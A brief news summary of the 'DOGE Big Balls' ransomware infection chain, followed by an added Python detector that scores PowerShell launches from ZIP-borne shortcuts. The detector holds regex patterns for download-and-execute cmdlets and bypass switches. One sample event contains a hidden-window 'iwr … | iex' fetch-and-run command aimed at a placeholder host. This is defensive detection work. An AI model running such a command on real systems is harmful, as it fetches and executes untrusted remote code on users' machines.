DOGE 'Big Balls' Ransomware Utilizes ZIP-Based LNK Shortcuts and BYOVD Techniques for Stealthy Attacks - #DogeBigBalls
A new ransomware campaign called "DOGE BIG BALLS" has been discovered, utilizing a complex multi-stage infection process. The attack begins with a ZIP file containing a deceptive LNK shortcut that executes PowerShell commands to download and run a script. This script checks for administrative privileges and, if present, downloads a disguised version of Fog ransomware and a kernel exploit tool. The ransomware employs sophisticated techniques, including kernel-level access exploitation, detailed system information collection, and geolocation via the Wigle.net API. It also incorporates a Havoc C2 beacon for potential post-encryption activities and uses anti-analysis techniques to evade detection. To defend against such threats, experts recommend implementing various security measures, including blocking untrusted files and scripts, monitoring for anomalies, deploying EDR solutions, limiting administrative privileges, and restricting outbound traffic.
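The first stage described above (a ZIP-delivered LNK that launches PowerShell to fetch and run a script) is the point where this chain is easiest to catch in process-creation telemetry. The following detector is an added example, not code from the original article or from any vendor; it scores PowerShell launches by parent process, command-line switches, download-and-execute cmdlets, working directory and token elevation. The event records, field names and the `placeholder.invalid` URLs are constructed for illustration, modelled loosely on the fields a Sysmon or EDR process-creation event carries.

```python
"""Heuristic detector for a ZIP -> LNK -> PowerShell download-and-execute launch.
Added example; event layout and sample data are constructed, not real telemetry."""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    """One process-creation record (constructed, modelled on common EDR fields)."""
    pid: int
    image: str                 # full path of the new process
    cmdline: str               # its command line
    parent_image: str          # full path of the parent process
    cwd: str = ""              # working directory at launch (cf. Sysmon CurrentDirectory)
    user_elevated: bool = False  # whether the process token is elevated


POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
# Cmdlets/aliases used to fetch remote content and run it in-memory.
DOWNLOAD_EXEC = re.compile(
    r"(invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|downloadstring|downloadfile|"
    r"start-bitstransfer|invoke-expression|\biex\b)", re.I)
# Switches commonly combined to run without a window, profile or execution policy.
QUIET_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-(ep|executionpolicy)\s+bypass|"
    r"-enc(odedcommand)?\b)", re.I)
# Parents consistent with a user double-clicking a shortcut from Explorer or an archiver.
LAUNCHER_PARENT = re.compile(r"\\(explorer|7zfm|7zg|winrar|winzip\d*)\.exe$", re.I)
# Folders where Explorer/archivers unpack a ZIP before running its contents.
ZIP_TEMP = re.compile(r"\\temp\d*_[^\\]+\.zip\\|\\rar\$[^\\]*\\|\.zip\\", re.I)


def score_event(ev: ProcEvent) -> Tuple[int, List[str]]:
    """Return (score, reasons) for a PowerShell launch; other images score 0."""
    if not POWERSHELL.search(ev.image):
        return 0, []
    score, reasons = 0, []
    if DOWNLOAD_EXEC.search(ev.cmdline):
        score += 2
        reasons.append("download-and-execute cmdlet in command line")
    flags = {m.group(0).lower() for m in QUIET_FLAGS.finditer(ev.cmdline)}
    if flags:
        score += min(len(flags), 2)  # cap so switches alone cannot trigger an alert
        reasons.append("quiet/policy-bypass switches: " + ", ".join(sorted(flags)))
    if LAUNCHER_PARENT.search(ev.parent_image):
        score += 1
        parent = ev.parent_image.rsplit("\\", 1)[-1]
        reasons.append(f"spawned by {parent} (shortcut/archive launcher)")
    if ZIP_TEMP.search(ev.cwd) or ZIP_TEMP.search(ev.cmdline):
        score += 1
        reasons.append("working directory or arguments point into a ZIP extraction folder")
    if ev.user_elevated:
        score += 1
        reasons.append("process token is elevated")
    return score, reasons


def detect(events: List[ProcEvent], threshold: int = 3) -> List[Tuple[int, int, List[str]]]:
    """Alert on events that both fetch-and-run content and reach the score threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold and any(r.startswith("download") for r in reasons):
            hits.append((ev.pid, score, reasons))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events: one matching the described first stage, three benign.
SAMPLE_EVENTS = [
    ProcEvent(4120, PS,
              'powershell.exe -w hidden -nop -ep bypass -c "iwr http://placeholder.invalid/p.ps1 | iex"',
              r"C:\Windows\explorer.exe",
              cwd=r"C:\Users\user\AppData\Local\Temp\Temp1_invoice.zip" + "\\"),
    ProcEvent(5200, PS, 'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(6001, r"C:\Program Files\App\updater.exe", "updater.exe --check",
              r"C:\Windows\System32\services.exe"),
    ProcEvent(7300, PS,
              'powershell -Command "Invoke-WebRequest https://placeholder.invalid/a.msi -OutFile C:\\t\\a.msi"',
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for pid, score, reasons in detect(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} score={score}")
        for r in reasons:
            print("  -", r)
```

Only the Explorer-spawned, hidden-window, policy-bypassing download-and-execute launch crosses the threshold; an administrator's plain `Invoke-WebRequest -OutFile` from `cmd.exe` scores below it, which is the trade-off a tuning threshold is for.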